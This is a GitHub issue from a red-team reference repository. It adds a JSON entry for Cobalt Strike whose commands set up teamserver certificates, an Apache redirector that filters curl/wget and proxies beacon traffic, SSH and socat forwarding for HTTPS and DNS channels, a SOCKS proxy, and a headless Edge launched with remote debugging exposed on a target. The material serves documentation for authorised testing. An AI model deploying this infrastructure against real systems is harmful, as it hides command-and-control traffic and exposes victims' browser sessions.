Patrick-DE / RTT-Docs

Public repository for the techniques and tools shown on rtt.secdu.de
GNU Affero General Public License v3.0

New tool: Cobalt Strike #127

Open Patrick-DE opened 5 months ago

Patrick-DE commented 5 months ago
{
  "name": "Cobalt Strike",
  "phases": [
    "00. Infrastructure"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows",
    "Linux"
  ],
  "source": "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm",
  "description": "Cobalt Strike is a platform for adversary simulations and red team operations. The product is designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors.",
  "undetected": [],
  "detected": [],
  "commands": [
    {
      "id": "1911bd14-d626-4e98-9938-15398478f49f",
      "name": "Add certificate to server",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "#Generating a RSA private key\nopenssl req -x509 -nodes -newkey rsa:2048 -keyout localhost.key -out localhost.crt -sha256 -days 365 -subj '/CN=localhost'\n#combine the separate public and private files into a single PFX file\nopenssl pkcs12 -inkey localhost.key -in localhost.crt -export -out localhost.pfx\n#PFX file to a Java KeyStore\nkeytool -importkeystore -srckeystore localhost.pfx -srcstoretype pkcs12 -destkeystore localhost.store\n#upload to CS directory\nscp localhost.store attacker@10.10.10.10:/home/attacker/cobaltstrike/\n#add to the malleable profile\nhttps-certificate {\n     set keystore \"localhost.store\";\n     set password \"passsword\";\n}"
    },
    {
      "id": "f6feb24b-9f33-4ff8-8332-41c624e63bb1",
      "name": "Setup redirector",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "sudo apt install apache2\nsudo a2enmod ssl rewrite proxy proxy_http\nsudo cd /etc/apache2/sites-enabled\nsudo rm 000-default.conf\nsudo ln -s ../sites-available/default-ssl.conf .\nsudo systemctl restart apache2"
    },
    {
      "id": "cb900e82-c79e-4b35-b015-a222a5e1a159",
      "name": "Generate SSL certificate",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "openssl genrsa -out ecorp.key 2048\nopenssl req -new -key ecorp.key -out ecorp.csr\n#identify the path to your CA in this example /home/attacker/ca/\n#create ecorp.ext\nauthorityKeyIdentifier=keyid,issuer\nbasicConstraints=CA:FALSE\nkeyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment\nsubjectAltName = @alt_names\n\n[alt_names]\nDNS.1 = ecorp.com\nDNS.2 = www.ecorp.com\n#generate cert\nopenssl x509 -req -in ecorp.csr -CA ca/ca.crt -CAkey ca/ca.key -CAcreateserial -out ecorp.crt -days 365 -sha256 -extfile ca/ecorp.ext\n#view cert\nopenssl x509 -noout -text -in ecorp.crt\n#upload cert\nscp ecorp.key attacker@10.10.0.100:/home/attacker/private.key\nscp ecorp.crt attacker@10.10.0.100:/home/attacker/public.crt\nsudo cp private.key /etc/ssl/private/\nsudo cp public.crt /etc/ssl/certs/\n#change apache2 config\nsudo nano /etc/apache2/sites-enabled/default-ssl.conf\n+SSLCertificateKeyFile  /etc/ssl/private/private.key\n+SSLCertificateFile     /etc/ssl/private/public.crt\nsudo systemctl restart apache2"
    },
    {
      "id": "5188e899-ecc7-40ff-adf7-22c481818012",
      "name": "Connect redirector with teamserver",
      "description": "-N: no shell.\n-R is remote-port:host:host-port. Binds port 8443 on the redirector; any traffic arriving on that port is forwarded to 127.0.0.1:443 on the team server.",
      "tag": "",
      "results": [],
      "cmd": "#reverse proxy\nssh -N -R 8443:localhost:443 redirector@10.10.10.10\n#add certificate to redirector\nscp localhost.crt redirector@10.10.10.10:/home/attacker/\nsudo cp localhost.crt /usr/local/share/ca-certificates/\nsudo update-ca-certificates\n#add apache2 config \nsudo nano /etc/apache2/sites-enabled/default-ssl.conf\n--\n<Directory /var/www/html/>\n    Options Indexes FollowSymLinks MultiViews\n    AllowOverride All\n    Require all granted\n</Directory>\nSSLProxyEngine on\n--\n#add 404 page\necho \"404\" | sudo tee /var/www/html/404\n#add redirect with user_agent (curl or wget => block) + cookie (requires SESSIONID) check\nsudo nano /var/www/html/.htaccess\n--\nRewriteEngine on\n\nRewriteCond %{HTTP_USER_AGENT} curl|wget [NC]\nRewriteRule ^a$ 404 [PT]\n\nRewriteCond /var/www/html/%{REQUEST_URI} -f\nRewriteRule ^.*$ %{REQUEST_FILENAME} [L]\n\nRewriteCond %{HTTP_COOKIE} SESSIONID\nRewriteRule ^.*$ https://localhost:8443%{REQUEST_URI} [P]\n--"
    },
    {
      "id": "9c6d8fec-47c0-4c90-81c7-80dd680ae17a",
      "name": "DNS redirector",
      "description": "SSH into redirector-2 and set up a port forward between port 5353 on the redirector and port 5353 on the team server",
      "tag": "",
      "results": [],
      "cmd": "Name\tType\tData\nns1\t    A\t    10.10.0.200\ndns\t    NS\t    ns1.ecorp.com.\n\nssh attacker@10.10.0.200 -R 5353:localhost:5353\n#use socat to listen on UDP 53 on redirector-2 and forward the traffic to TCP 5353\nsudo socat udp4-listen:53,reuseaddr,fork tcp:localhost:5353\n#use socat to listen on TCP 5353 and forward the traffic to UDP 53\nsudo socat tcp-listen:5353,reuseaddr,fork udp4-sendto:localhost:53"
    },
    {
      "id": "78f5ce18-ca91-4c7c-ad1a-1785ca974333",
      "name": "Setup SOCKS",
      "description": "",
      "tag": "",
      "results": [
        "PROTO:SOCKS"
      ],
      "cmd": "socks 9999 socks5"
    },
    {
      "id": "7445ce18-ca91-4c7c-ad1a-1785ca974333",
      "name": "Spawn Google Chrome in debug mode",
      "description": "",
      "tag": "",
      "requirements": {
        "tag": "TOOL:CHROMIUM"
       },
      "results": [
        "EXECUTION:REMOTE"
      ],
      "cmd": "execute 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe' --remote-debugging-port=9222 --remote-debugging-address=0.0.0.0 --user-data-dir=%appdata%\\Microsoft\\Edge --headless --ignore-certificate-errors about:blank"
    }
  ],
  "content": "",
  "references": []
}